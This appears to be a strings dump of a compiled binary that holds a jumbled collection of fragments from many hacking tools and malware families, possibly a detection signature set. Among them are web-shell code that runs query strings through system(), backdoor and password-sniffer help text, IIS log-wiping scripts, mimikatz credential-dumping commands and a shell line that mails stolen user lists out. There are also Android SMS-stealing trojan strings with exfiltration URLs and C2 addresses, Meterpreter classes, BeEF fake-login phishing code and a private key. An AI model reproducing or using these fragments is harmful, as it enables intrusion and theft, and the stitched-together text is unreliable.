ERROR starting FileSpy...exe\\filespy.dbg[/d <drive>] detaches monitor from <drive>Should be logging to screen...Filmon:  Unknown log record typed:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dlleditKeyLog.exe KeyLog.exe,WinEggDrop.DLLEditKeyLog.exewineggdropPassSniffer.exePOP3/FTP SnifferPassword Sniffer V1.0\"gina\"=\"gina.dll\"REGEDIT4[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]N
Press Any KeEnter 1 OBon >0 & <65535L--Choose VersionExA Only RuntUZemcpysetprintf\\WSFtartupresponse.write \"command completed success!\" for each co in foditems <input type=text name=text6 value=\"<%= szCMD6 %>\"><br> <title>Hello! Welcome </title>%s -Install                          -->To Install The Service%s -Start                            -->To Start The Service%s -Stop                             -->To Stop The ServiceThe Port Is Out Of RangeFail To Set The Port\\psapi.dllTInject.DllSoftware\\Microsoft\\Internet Explorer\\WinEggDropShellinjectt.exeSniffer.dll:Execute net.exe user Administrator passFport.exe or mport.exe :Password Sniffering Is Running |Not Running : The Terminal Service Port Has Been Set To NewPort: Del www.exe                   :Dir *.exe                    param = \"driver={Microsoft Access Driver (*.mdb)}\" conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") set rs=conn.execute (sql)%> <%set Conn = Server.CreateObject(\"ADODB.Connection\") <%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh sql=\"select * from scjh\" E
haoq@neusoft.comQQ2000b.exe\\qq2000b.exeW
SOFTWARE\\HAOQIANG\\Redirect SPort RemoteHost RPort       -->Port Redirectorhttp://IP/a.exe a.exe                 -->Download A FileStopSniffer                           -->Stop Pass SnifferTerminalPort Port                     -->Set New Terminal PortExample: Http://12.12.12.12/a.exe abc.exeCreate Password Sniffering Thread Successfully. Status:LoggingStartSniffer NIC                      -->Start SnifferShell                                 -->Get A ShellDeleteService ServiceName             -->Delete A ServiceDisconnect ThreadNumber|All           -->Disconnect OthersOnline                                -->List All Connected IPExample: Set REG_SZ Test Trojan.exeExecute Program                       -->Execute A ProgramReboot                                -->Reboot The SystemPassword Sniffering Is Not RunningProcess child = Runtime.getRuntime().exec(InputStream in = child.getInputStream();String cmd = request.getParameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>R
<br><p align=\"center\"><b>RangeScan Produced by isn03.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exeFail To InjectBtGRemote Pro; V1.5 B/{Permission denial to EXEC command.:(by Eyas<cooleyas@21cn.com>Connect to %s MSSQL server success.Enjoy the shell.^_^Usage: %s <host> <uid> <pwd>SqlCmd2.exe Inside Edition.Http://www.patching.net  2000/12/14Example: %s 192.168.0.1 sa \"\"A
port - Port to listen on, defaults to 2323Usage: srvcmd.exe [/h] [port]/h   - Hide WindowAccepted connection from client at %sError %d: %sh
Player.tmpP
mailto:sdemo@263.netS-Player.exeh
 http://arm.533.netTftpd32.hlpTimeouts and Ports should be numerical and can not be 0T
%d -- %sTIMEOUT while waiting for Ack block %d. file <%s>TftpPortTtftpd32BackGroundSOFTWARE\\TFTPD32E
Accessories\\wordpad.exegorillanation.comBefore editing the content of a cookie, you should close all windows of Internethttp://nirsoft.cjb.netA
 @Stego:syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";$_ = $ENV{QUERY_STRING};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\">   Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName)     value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\">  WIndows 2000 OldPwd = Request.Form(\"OldPwd\") NewPwd2 = Request.Form(\"NewPwd2\") NewPwd1 = Request.Form(\"NewPwd1\") made to port 80 of the remote machine at 192.168.1.101 with theUnable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s    - outbound source port numberAttempting to connect to %s port %dUsage: concon \\\\ip\\sharename\\con\\conexitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, FalseEchoB(\"regsvr32.exe exitcode = \" & exitcode)Public Property Get oFS()CleanIP - Specify IP Address Which You Want Clear.LogFile - Specify Log File Which You Want Process.CleanIISLog VermsftpsvcFatal Error: MFC initialization failedSpecified \"ALL\" Will Process All Log Files.Specified \".\" Will Clean All IP Record.Service %s Stopped.Process Log File %s...Power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"SQLCheck can only scan a class B network. Try again.Example: SQLCheck 192.168.0.1 192.168.0.254Usage: SQLCheck <StartIP> <EndIP>RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.comNote: This Program Can'nt Run With Local Machine.%s Execute Succussifully.Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]Creation of results file - \"%s\" failed.c:\\>nbtdump remote-machineCerberus NBTDUMP<CENTER><H1>Cerberus Internet Scanner</H1><
Portions Copyright (c) 1997-1999 Lee HasiukWINNT\\System32\\stdole2.tlbG
NeoLite Executable File Compressorie686@sohu.comsplitjoin.exeSplitJoin<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">Set thisfile = fs.GetFile(whichfile)if Request.Cookies(\"password\")=\"juchen\" then Set thisfile = fs.OpenTextFile(whichfile, 1, False)color: rgb(255,0,0); text-decoration: underline }if Request(\"creat\")<>\"yes\" then<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.Execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s    - outbound connection source port numberFPipeTo Open RegistryI love Candy very much!!GinaDLLh
TRM_HOOKCALLBACK(non-Win32 .EXE or error in .EXE image).PASS hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exeMAIL FROM:hacker@hacker.comhttp://isno.yeah.netSet ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)Set objNet = WScript.CreateObject( \"WScript.Network\" )Set fso = CreateObject(\"Scripting.FileSystemObject\")2TInject.DllWindows ServicesFindrst6Press Any Key To Continue......if not exist %1\\rshsetup.exe goto ERROR2ECHO rshsetup.exe is not found in the %1 directoryREM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeECHO Use \"net start rshsvc\" to start the service.rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dllpushd %SystemRoot%\\system32NEWGINA.dllWlxActivateUserShellWlxWkstaLockedSASWlxIsLockOkWlxShutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lstS
\\ws2check.exe\\trojans.lst1
%s - simple sniffer for win2000  -pass        : Filter username/password  -udp         : Output udp packets  -tcp         : Output tcp packetsFScan v1.12 - Command line port scanner. -n    - no port scanning - only pinging (unless you use -q)Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200 -z    - maximum simultaneous threads to use for scanningFailed to open the IP list file \"%s\" -p    - TCP port(s) to scan (a comma separated list of ports/ranges) Bind port number out of range. Using system default.f
Connecting HTTP Port - Result: No space for command line argument vectorMicrosoft(July/1999~) http://www.microsoft.com/technet/security/current.aspNo space for copy of command line-  Windows NT,2000 Patch Method  - scanf : floating point formats not linkedhrdir_b.c: LoadLibrary != mmdll borlndmm failed!\"what?\"%s Port %d Closedprintf : floating point formats not linkedxxtype.cpp-ERR Invalid Command, Type [Help] For Command List-ERR Get SMS Users ID FailedControl Time Out 90 Secs, Connection Closed-ERR Post SMS FailedCurrent.hltHistroy.hlt-ERR Send SMS Failed-ERR Change Password <New Password>+OK Send SMS Succussifully+OK Set New Password: [%s]CHANGE PASSWORDS:\\Ammyy\\sources\\target\\TrService.cppS:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cppGlobal\\Ammyy.Target.IncomePortS:\\Ammyy\\sources\\target\\TrFmFileSys.cppPlease enter password for accessing remote computerCreateProcess1()#3 %d error=%dCHttpClient::SendRequest2(%s, %s, %d) error: invalid host name.ERROR: CreateProcessAsUser() error=%d, session=%dERROR: FindProcessByName('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.Type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]Slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ Passwords don't match - your armor crumbles away ][ Passwords don't match - checking turned off ]Writing packet : error on socket (or connection closed): %sRemote connection closed by signal SIG%s %sReading private key %s failed (bad passphrase ?)Server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sRemote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainPublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u seconds. (found %d ips)Usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)Invalid IP.# scanning: Unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by Eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\rkillall -9 pscan2echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = AF_INET;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$Plug-in thread causes an exception, failed to alert user.PlugGetUdpPortPlugGetTcpPortPlugGetVulnNum\\\\.\\pipe\\PipeCmd_communicatonPipeCmd ServiceL
DefaultPort.lstScan over.Used %dms!w
Connect to %s MSSQL server success. Type Command at Prompt.;DATABASE=masterSELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserversekurlsa::msvsekurlsa::wdigestsekurlsa::kerberossekurlsa::tspkgsekurlsa::livesspsekurlsa::sspsekurlsa::processekurlsa::minidumpsekurlsa::pthsekurlsa::ticketssekurlsa::ekeyssekurlsa::dpapisekurlsa::credmancryptprimitives.pdbNow is t1OALICE123BOBBY456
\\Domains\\Account\\Domains\\Account\\Users\\Names\\SID               :* NTLM     :Authentication Id :wdigest :\\Release\\AppInitHook.pdbAppInitHook.dllm
VoidFuncSelect * from Win32_Service Where Name ='VSS'Select * From Win32_ShadowCopycmd /C mklink /D ClientAccessibleTCP Port ScannepUsage:   %s TCP/SYN StartIP [EndIP] Ports [Threads] [/T(N)] [/(H)Banner] [/Save]\nGlobal\\FwtSqmSession106829323_S-1-5-19EVERYONEy0uar3@s!llyid!07,ou74n60u7f001\\KB25468.datNetMgStartNetmgmt.srgprxTroy
\"%s\"  /install \"%s\"\"%s\"  \"%s\" \"%s\" %sgoto xzz%d.bat\
EVverclvid.exel2r8iX
^G1'91
ca[=Yhg!
ECTLUSetEndOfFileu
t_quit_got_dir
C!@I#%VJSIEOTQWPVz034vuABAISEO%$2fas9vQsfvx%$1.2.7.f-hanba-win64-v1md %s&copy %s\\*.* %s%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\"Ge.tVol. .umeIn..for  mati.onW
RSRC_HTMLHwpFilePathCheck.dllAdobeArm.exeOpenDocumentExePath: %s\nXlsPath: %s\nTmpPath: %s\nscvrit001.batxc123465-efff-87cc-37abcdef9[
cvrit000.bat[
WMPNetworkSvcUpdatebackSched.dll\\mspaint.exeX,LLIe{))%%l2i<[AM|aq!Ql/lPlw]d7@C-#j.<c|#*}Kx4_H(q^F-F^p/[t#%HT%s is an essential element in Windows System configuration and management. %s%SYSTEMROOT%\\system32\\svchost.exe -k %s\\system32\\%s:R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat}[eLkQAeEae0t@h18g!)3x-RvE%+^`n.6^()?+00ME6a&F7vcV}`@.dj]&u$o*vX
scardprv.dll
 0@P`p
xercescSuccess - Accept AuthFail - Accept Auth%s %-20s %10lu %sRESPONSE 200 OK!!!
@recdiscm32.exe\\\\%s\\shared$\\syswow64\\\\%s\\shared$\\system32!emCFgv7Xc8ItaVGN0bMf!ctRHFEX5m9JnZdDfpK!VWBeBxYx1nzrCkBLGQOiamsorry!@1234567cmd.exe /c \"net share admin$ /d\"MAIL FROM:<Subject: %s|%s|%s
wmplog21t.sqmwmplog15r.sqmwmplog09c.sqmKBD_%%s_%%02d%%02d%%02d%%02d%%02d.CAT:L1\ndel \"%s\"\nif exist \"%s\" goto L1\ndel \"%s\"\n\" goto R1\ndel /a \"@echo off\n:R1\ndel /a \"*
uwauserv.dll
banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdSTART_SERVICEextra_key_smsandroid.provider.Telephony.SMS_RECEIVEDmPhoneNumbercnlybnq.qrk" // encrypted string "payload.dexCardholder nameinstagram.phpupd.php?text=android.app.action.ADD_DEVICE_ADMINTap ACTIVATE to continue with software update/upload-pictures.php?Opened Dialog:com/connect/MyServiceandroid/os/Binderandroid/app/ServiceDroidianDroidianServiceServiceReceiverDendroidlastGamefile:///android_asset/enableCheatshttp://112.74.111.42:8000SHA1-Digest: oIx4iYWeTtKib4fBH7hcONeHuaE=ONLINEGAMEPROCEDURE_WHICH_WAP_IDhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogSHA1-Digest: +RsrTx5SNjstrnt7pNaeQAzY4kc=SHA1-Digest: Rt2oRts0wWTjffGlETGfFix1dfE=http://image.baidu.com/wisebrowse/index?tag1=%E6%98%8E%E6%98%9F&tag2=%E5%A5%B3%E6%98%8E%E6%98%9F&tag3=%E5%85%A8%E9%83%A8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022D4NotLeftTriangleEqual=022ECSHA1-Digest: X27Zpw9c6eyXvEFuZfCL2LmumtI=_ZNSt12_Vector_baseISsSaISsEE13_M_deallocateEPSsjFBTP2AHR3WKC6LEYON7D5GZXVISMJ4QUlibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizAndroidManifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2Decrypt.malloc.memset.free.pluginSMS_encrypt.Java_com_skymobi_pay_common_util_LocalDataDecrpty_Encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%VILLLLLL280128120000Z0W1E6FFF4C5062FBDC9886FEC93A75D2AC1121120104150Z&inbox_timestamp > 0 and is_permanent=1contact_id = ? AND mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.B99^GGD&R-22922222222222222222Q^SAAWAt2222222222229222Q^SAAWAbuildidDCEF055EEE3F76CABB27B3BD7233F6E3C143D55D996634D1B761709372042474FIND_VALID_DOMAIN6589y459ZActivityLcom/android/zics/ZRuntimeInterfaceMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/Jvgb0/jSRWi7i4J9IwO72KZw404kj02A97ExbUefVeE7yyWSTbKw5sYlKXCtaoQwWr19j0Y+xb6+h2BRuNx307BV/QpG6DnPg+Lx8fPPvhbhOudgKb/XuZPaz/GJbTpwzTbBmT+mI1QTRLyAKDxSjGWYvoPFVz82RxcAblV/twIDAQABMIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAL8m+BvT+NJFaLuLgn0jA7vYpnDjTiSPTYD3sTFtR59V4TvLJZJNsrDmxiUpcK1qhDBavX2PRj7Fvr6HYFG43HfTsFX9CkboOc+D4vHx88++FuE652Apv9e5k9rP8YltOnDNNsGZP6YjVBNEvIAoPFKMZZi+g8VXPzZHFwBuVX+3AgMBAAECgYBLYR6uOqUApoZqjtVia5BpX0Ijej+ygyBZH1Qs3Z9E4iTz42RpkWJKCHdS6Eia2kpOlznqbbmRv4E8uT3ufCvUFexjR5ClGVKJ+XHXxqS75+KT38wGZZ1bW0pK4sT1/aGLrt5/netwuzMi/YFNfAKRPqvRXuNcxNLhMhs2efLKIQJBAPGea2UXVWd0Ti8ClA8hiWPSNCPtcp41Dh2H0YczrFmO2zafPPJih2GQY5txszwBLbjxFCY8/WhrYAqx0itMrgsCQQDKh5U1NfpRvk0Hu8iBRB/LPyGimz+WM/chFSC65SlS/cml3U7hUOj2lRGPz+bm68624H0KLviqpBJpmayvbbyFAkEA1NNFJ9uAx8rDn1b3EcjpmvqqIMdjwYVcNJjQ7/WNJ6nU3+0toxc0xrSHeIGTbhRfsNrxc6kfUV3bUDBHvwog9wJBAI+fRH1ekOwlAqVIUnDw6YcNdwHEDHysz0TDodlHp112Ieign06DPSGYJsMQURNTB92CJsnw82C3R2Nhmicxr60CQQCN466JF9GJRZipO64OYw/ElMac7vXgTeGMvYZ2/yfX5CRCLua4DygD1Ju0eMXpea9og/EtwCTV0RVpFc9SSN8VHHHEEEEEEBBBBBB??????;;;;;;888888444444000000,,,,,,''''''''''''######OOO###2e6081a2-a063-45c7-ab90-5db596e42c7cMSACM32.dllMAIN_TEXT_TAG080229013346Z350717013346Z0NUMBER_CHAR_EXP_SIGNLoganberryApplicationattachBaseContextObstetricres/xml/device_admin_data.xml]data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACABAMAAAAxEHz4AAAAGFBMVEVMaXGUwUWTwEaTwEaTwEaTwEaVwUWTwEalNfqIAAAAB3RSTlMALozOuetYmPN8xgAAAbFJREFUeF7t2E9L+zAcx/FP1i3n7PfHXauivW7K3HWAY1dFoNci2l61Lvs8fUOxZYW22RdBBub1AN4kX7KQDqcvCILgDC0aUlcGhzaQ+j/HAb2HlC5buTXEEoMGlgZikzkAledTAKM95HSJPxs6T9eYrSGHZMMvuyXkoLZs2AxyCQ98GEi9sqWEkGYb1/INMGUtFW9iRDLWdWGhtuQCEgW5a+ZIgwn5AQFVjQ0zViwQkYwFgYjVCorDFfBdtgMyU80MkFC2h5SOXfGLXbIqyg9B2xzHGrODZAgzdioFM+y0E5zjThbHurzthl9Bb24M8HLfzQCXT+cYsiX3QMJuBn9Jazz3CLOBwIrko+8IzvsDmk7pO4Lv/YExPT/rxBOI6NjTCIRACIRACITA2BeY0XnoD4x8D5WITtwfUKnnraVScof+AArfk/cfbTwU0CveYdDUYCgANYXPYKBx+oEQKL772I7YaS/+cG+zMY6m8vyFDnOnqpV5nkFkVI+tvmWAXxkIgRDQdGxzO7xBSqX1B9qEzhpiBcmHei3WQEyn9d9fr+QCcji7yFDB8zV+QhAEQfAJcs5K2TAQqxAAAAAASUVORK5CYII=device_admin_descPillagedActivityEpigraphyServicexbot007:Write APK file (from txt in assets) to SDCard sucessfully!4Write APK (from Txt in assets) file to SDCard  Fail!138675150963res/xml/device_admin.xmlDevice registered: regId =cmVudCYmJg==dXNzZCYmJg==HDNRQ2gOlmlElvyohc9Y1X+nzVUEjW8W3SbUAcertificado # 73828394A compania TMN informa que o vosso sistema Android tem vulnerabilidadeandroid.app.extra.ADD_EXPLANATIONdevice_policycontent://sms/#admin_startkill callunstop all numbers*Lcom/metasploit/stage/PayloadTrustManager;(com.metasploit.stage.PayloadTrustManagerLcom/metasploit/stage/Payload$1;Lcom/metasploit/stage/Payload;-com.metasploit.meterpreter.AndroidMeterpreter,Lcom/metasploit/stage/MainBroadcastReceiver;#Lcom/metasploit/stage/MainActivity;Lcom/metasploit/stage/a;Lcom/metasploit/stage/c;Lcom/metasploit/stage/b;android.engine.apktel:lockNowCmd_confSms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlPKSELEN3333http://mayis24.4tubetv.xyz/dmr/yaNPKIportraitCallBack(android.app.extra.DEVICE_ADMINSMSReceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_dataVisa ElectronE!QQAZXS__exidx_endres/layout/notify_apkinstall.xmlPKpluginSMS_decrypt__dso_handlelib/armeabi/libmylib.soUT]Diok\"3|0597794205New victim arrivedhttp://ksa-sef.com/Hack%20Mobaile/ADDNewSMS.phphttp://ksa-sef.com/Hack%20Mobaile/AddAllLogCall.phphttp://ksa-sef.com/Hack%20Mobaile/addScreenShot.phphttp://ksa-sef.com/Hack%20Mobaile/ADDSMS.phphttp://ksa-sef.com/Hack%20Mobaile/ADDVCF.phphttp://ksa-sef.com/Hack%20Mobaile/ADDIMSI.phphttp://ksa-sef.com/Hack%20Mobaile/ADDHISTORYINTERNET.phphttp://ksa-sef.com/Hack%20Mobaile/addInconingLogs.phpodNotice.txtcamera This device has camera!camera This device has Nooo camera!send|1sBdBBbbBBF|K|send|372|ScreamSMS|senssdsend|5ms5gs5anncsend|45CLCLCa01send|999SAnd|TimeStart!s!c!r!e!a!m!SERVER_IPSERVER_NAMEcontent://sms/inboxscreamHackerscreamondroid.pnggetSrvAddrgetSrvPortandroid.intent.action.START_GOOGLE_SERVICEjavascript:scrollTojavascript:document.getElementById('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/PopReceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obBkPVC2pvJmWSfHzXhhttp://joyappstech.biz:11111/knock/I HATE TESTERS onGlobalLayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtQ,hu4P#hT;U!XO7T,uD+Gkwg#M!lf>Laq&+J{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getElementById('darkenScreenObject'); beef.execute(function() {var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('Enter your Apple ID e-mail address and password');sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo  = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"LinkedIn\">';var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>Forinner.append(title, description, user,password);sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getElementById('uname').value+':'+document.getElementById('pass').value;password.keydown(function(event) {j@h
UVODFRYSIHLNWPEJXQZAKCBGMT_
*tanentry**<option*<select*<inputsenhacartaocaix
[]A\A]A^A_
GCC: (GNU) 7.2.0
init.c
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.6973
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
/tmp/ccnAy7Ww.o
Lsignature
Lsignature_end
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.comment